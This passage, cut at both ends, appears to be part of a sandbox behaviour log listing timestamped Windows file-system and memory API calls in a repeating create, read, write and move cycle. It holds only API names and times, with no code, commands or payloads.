"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,197", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,207", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,217", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:59,217", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,217", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,307", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,307", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,317", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,327", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,327", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,327", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:59,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,337", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,337", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,347", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,347", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,357", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,357", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,368", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,378", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,378", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,388", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,388", "api": "MoveFileWithProgressW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,398", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,398", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,408", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,408", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,418", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:59,418", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,428", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,438", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,438", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,448", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:59,448", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,448", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,458", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,478", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,478", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,488", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,488", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,498", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,498", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,508", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,508", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,518", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,518", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:59,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,528", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,528", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,538", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,538", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 
17:41:59,548", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,548", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,558", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,558", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,568", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,568", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,588", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,588", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,588", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,598", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,598", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,598", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,608", "api": "NtCreateFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:59,618", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,618", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,618", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,618", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,628", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,628", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,628", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:59,638", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,638", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,638", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,648", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,648", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,648", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,658", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:59,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,668", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,668", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:59,678", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:59,678", "api": 